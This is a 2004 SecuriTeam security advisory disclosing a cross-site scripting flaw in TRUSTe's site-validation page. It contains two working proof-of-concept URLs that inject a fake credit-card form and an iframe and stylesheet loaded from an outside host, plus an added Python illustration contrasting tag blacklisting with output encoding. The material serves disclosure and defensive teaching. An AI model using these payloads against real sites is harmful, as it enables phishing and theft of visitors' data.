[NEWS] TRUSTe.org Cross Site Scripting and Phishing Opportunities

From: SecuriTeam (support_at_securiteam.com)
Date: 11/09/04

    To: list@securiteam.com
    Date: 9 Nov 2004 18:40:55 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      TRUSTe.org Cross Site Scripting and Phishing Opportunities
    ------------------------------------------------------------------------

    SUMMARY

    TRUSTe is an independent, nonprofit organization dedicated to enabling
    individuals and organizations to establish trusting relationships based on
    respect for personal identity and information in the evolving networked
    world. Through extensive consumer and Web site research and the support
    and guidance of many established companies and industry experts, TRUSTe
    has earned a reputation as the leader in promoting privacy policy
    disclosure, informed user consent, and consumer education.

    One of TRUSTe.org's services lets a visitor query whether a given web site
    is TRUSTe validated. This service has been found to contain a cross site
    scripting vulnerability that exposes the TRUSTe web site to attack and also
    allows TRUSTe to be used as a phishing source.

    DETAILS

    TRUSTe's 'ivalidate.php' is used to validate "trusted" sites. Whilst the
    script does add slashes to quotes and closes <script> and <style> tags,
    there are a number of HTML tags it does not strip, including
    <link>, <div> and <iframe>. This leaves the site open to attack from
    phishers wanting to make their site appear "trusted".

    Examples:
    https://www.truste.org/ivalidate.php?url=%3Cfont%20size=5px%3EYou%20are%20not%20verified!%3C/font%3E%3Cbr%3E%3Cbr%3EQuick!%20Send%20us%20some%20money%20to%20fix%20this!%3Cform%20action=http://www.antiphishing.org/%3E%3CBR%3ECREDITCARDNUMBER:%3Cinput%20type=text%3E%3Cinput%20type=submit%3E%3C/form%3E%3Cbr%3E%3Cbr%3ETEH%20FLAP%20Strikes%20once%20again%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E

    https://www.truste.org/ivalidate.php?url=%3C/b%3E%3C/p%3E%3C/tr%3E%3C/tr%3E%3C/table%3E%3C/center%3E%3C/div%3E%3Clink%20href=http://wheresthebeef.co.uk/XSS/xss.css%20rel=style***%20type=text/css%3E%3Cdiv%20class=pwn%3E%3Ciframe%20src=http://wheresthebeef.co.uk/XSS/xss.htm%20height=1000px%20width=100%25%20FRAMEBORDER=0%20SCROLLING=NO%3E%20%3C/iframe%3E%3C/div%3E
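    The root cause described above is a tag blacklist applied to a reflected
    parameter. The following Python snippet is an added illustration, not code
    from the advisory, from SecuriTeam or from TRUSTe: blacklist_sanitize()
    approximates the behaviour the advisory describes (backslash-escaping of
    quotes plus removal of <script>/<style> tags), escape_for_html() is the
    hardened alternative (entity-encoding the whole value for an HTML text
    context), and render_result() is a hypothetical template standing in for
    the validation page. The payload is constructed in the style of the
    advisory's examples and points at a non-routable host.

```python
import html
import re
from typing import Callable, List

# Constructed payload in the style of the advisory's PoC URLs (no quotes,
# so addslashes-style escaping never triggers). example.invalid is a
# reserved, non-routable name used purely as a placeholder.
CONSTRUCTED_PAYLOAD = (
    "<script>alert(1)</script>"
    "<div class=pwn>"
    "<iframe src=http://example.invalid/ height=1000px width=100%></iframe>"
    "<link href=http://example.invalid/x.css rel=stylesheet>"
    "</div>"
)

# Matches the opening of any tag; group 2 is the tag name.
TAG_RE = re.compile(r"<(/?)([a-zA-Z][a-zA-Z0-9]*)")


def blacklist_sanitize(value: str) -> str:
    """Approximation (an assumption, not TRUSTe's code) of the filtering the
    advisory describes: PHP addslashes-style quote escaping and removal of
    <script> and <style> tags. Every other tag passes through untouched."""
    value = value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    value = re.sub(r"</?script[^>]*>", "", value, flags=re.I)
    value = re.sub(r"</?style[^>]*>", "", value, flags=re.I)
    return value


def escape_for_html(value: str) -> str:
    """Hardened form: contextual output encoding. '<', '>', '&' and quotes
    become entities, so the browser can never parse the value as markup,
    whatever tags it contains. No blacklist to keep up to date."""
    return html.escape(value, quote=True)


def render_result(site: str, sanitizer: Callable[[str], str]) -> str:
    """Hypothetical template resembling a 'is this site validated?' answer
    that reflects the user-supplied url parameter into the page body."""
    return f"<p>The site {sanitizer(site)} is not a TRUSTe validated site.</p>"


def injected_tags(rendered: str) -> List[str]:
    """Tag names present in the rendered page that are not part of the
    template (only <p> is). Non-empty means attacker markup survived."""
    found = {m.group(2).lower() for m in TAG_RE.finditer(rendered)}
    return sorted(found - {"p"})


if __name__ == "__main__":
    for name, fn in (("blacklist", blacklist_sanitize), ("escape", escape_for_html)):
        page = render_result(CONSTRUCTED_PAYLOAD, fn)
        print(f"{name:9s} -> injected tags: {injected_tags(page)}")
```

    Running it shows the blacklist version removing only the <script> pair
    while <div>, <iframe> and <link> reach the browser intact (enough for the
    overlay shown in the second example above), whereas the entity-encoded
    version reflects the same input as inert text. For defenders reviewing a
    filter like this, the check is simple: any sanitizer that enumerates bad
    tags, rather than encoding for the output context, should be treated as
    bypassable.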

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:stfunub@gmail.com> Andrew
    Smith.
    The original article can be found at: <http://wheresthebeef.co.uk/XSS/>

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

